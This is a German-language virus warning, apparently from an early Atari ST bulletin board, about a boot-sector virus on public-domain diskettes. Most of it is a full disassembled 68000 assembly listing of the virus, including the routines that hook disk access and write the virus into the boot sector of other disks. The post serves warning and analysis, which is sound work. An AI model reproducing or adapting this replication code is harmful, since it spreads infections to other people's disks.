------------------------------------------------------------------------------- WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG ------------------------------------------------------------------------------- Auf PD-Disketten fuer den ST wurde ein Virus festgestellt. Angeblich soll er sich auch auf der PD-Diskette Nr. 115 von ST-Computer befunden haben. Dieser Virus befindet sich im Bootsektor von Disketten. Er wird beim Reset von der infizierten Diskette geladen und verbleibt bis zu naechsten Reset im Spei- cher. Bei jedem Diskettenzugriff schreibt er sich in den Bootsektor der gerade einglegten Diskette. Was er ausserdem noch macht, habe ich aus Zeitmangel noch nicht feststellen koennen. Damit sich Assemblerfreaks mit dem Virus beschaef- tigen koennen folgt ein Listing des Virus'. Anbei findet Ihr auch einen Viruskiller, der den Virus im Ram sowie auf Disket- ten unschaedlich macht. Allerdings meldet dieses Programm faelschlicherweise einen Virus im Ram, wenn von der HD gebootet wurde. HD-Besitzer sollten also die HD ausschalten, bevor sie das Killprogramm benutzen. MfG HORST Es folgt das Listing: !,001CB8 MOVE.L $0004C6,A1 2279 0000 04C6 "y...F !,001CBE ADDA.L #$00000600,A1 D3FC 0000 0600 S|.... !,001CC4 MOVE.L A1,A2 2449 $I !,001CC6 MOVE.W #$0100,D0 303C 0100 0<.. !,001CCA MOVE.W (A0)+,(A1)+ 32D8 2X !,001CCC SUBQ.W #1,D0 5340 S@ !,001CCE BPL $001CCA 6AFA jz !,001CD0 LEA $001CDE(PC),A0 41FA 000C Az.. !,001CD4 LEA $001C7A(PC),A1 43FA FFA4 Cz$ !,001CD8 SUBA.L A1,A0 91C9 .I !,001CDA ADDA.L A0,A2 D5C8 UH !,001CDC JMP (A2) 4ED2 NR !,001CDE LEA $001DA6(PC),A0 41FA 00C6 Az.F !,001CE2 MOVE.L $000472,(A0) 20B9 0000 0472 9...r !,001CE8 LEA $001CF4(PC),A0 41FA 000A Az.. !,001CEC MOVE.L A0,$000472 23C8 0000 0472 #H...r !,001CF2 RTS 4E75 Nu !,001CF4 LINK A6,#$0000 4E56 0000 NV.. !,001CF8 MOVE.W $0008(A6),-(A7) 3F2E 0008 ?... !,001CFC MOVE.L $001DA6(PC),A0 207A 00A8 z.( !,001D00 JSR (A0) 4E90 N. !,001D02 ADDQ.L #2,A7 548F T. !,001D04 MOVEM.L D0/A0-A1,-(A7) 48E7 80C0 Hg.@ !,001D08 LEA $001DAA(PC),A0 41FA 00A0 Az. !,001D0C TST.W (A0) 4A50 JP !,001D0E BEQ $001D9E 6700 008E g... !,001D12 MOVE.L $0004C6,A0 2079 0000 04C6 y...F !,001D18 MOVE.W (A0),D0 3010 0. !,001D1A CMP.W #$6038,D0 B07C 6038 0|`8 !,001D1E BEQ $001D7E 675E g^ !,001D20 LEA $001C7A(PC),A1 43FA FF58 CzX !,001D24 MOVE.W (A1)+,(A0)+ 30D9 0Y !,001D26 MOVE.W (A1)+,(A0)+ 30D9 0Y !,001D28 MOVE.W (A1)+,(A0)+ 30D9 0Y !,001D2A ADDA.L #$00000032,A1 D3FC 0000 0032 S|...2 !,001D30 ADDA.L #$00000032,A0 D1FC 0000 0032 Q|...2 !,001D36 MOVE.W #$00E7,D0 303C 00E7 0<.g !,001D3A MOVE.W (A1)+,(A0)+ 30D9 0Y !,001D3C SUBQ.W #1,D0 5340 S@ !,001D3E BNE $001D3A 66FA fz !,001D40 MOVE.W #$0001,-(A7) 3F3C 0001 ?<.. !,001D44 MOVE.W #$FFFF,-(A7) 3F3C FFFF ?< !,001D48 MOVE.L #$FFFFFFFF,-(A7) 2F3C FFFF FFFF /< !,001D4E MOVE.L $0004C6,-(A7) 2F39 0000 04C6 /9...F !,001D54 MOVE.W #$0012,-(A7) 3F3C 0012 ?<.. !,001D58 TRAP #14 4E4E NN !,001D5A MOVE.W #$0001,-(A7) 3F3C 0001 ?<.. !,001D5E CLR.L -(A7) 42A7 B' !,001D60 MOVE.W #$0001,-(A7) 3F3C 0001 ?<.. !,001D64 MOVE.W $0008(A6),-(A7) 3F2E 0008 ?... !,001D68 CLR.L -(A7) 42A7 B' !,001D6A MOVE.L $0004C6,-(A7) 2F39 0000 04C6 /9...F !,001D70 MOVE.W #$0009,-(A7) 3F3C 0009 ?<.. !,001D74 TRAP #14 4E4E NN !,001D76 ADDA.L #$00000022,A7 DFFC 0000 0022 _|..." !,001D7C BRA $001D9E 6020 ` !,001D7E MOVE.W $0002(A0),D0 3028 0002 0(.. !,001D82 CMP.W #$1092,D0 B07C 1092 0|.. !,001D86 BNE $001D9E 6616 f. !,001D88 LEA $001C7A(PC),A1 43FA FEF0 Cz~p !,001D8C MOVE.L $0002(A1),D0 2029 0002 ).. !,001D90 CMP.W $0004(A0),D0 B068 0004 0h.. !,001D94 BGT $001D9E 6E08 n. !,001D96 JSR (A0) 4E90 N. !,001D98 LEA $001DAA(PC),A0 41FA 0010 Az.. !,001D9C CLR.W (A0) 4250 BP !,001D9E MOVEM.L (A7)+,D0/A0-A1 4CDF 0301 L_.. !,001DA2 UNLK A6 4E5E N^ !,001DA4 RTS 4E75 Nu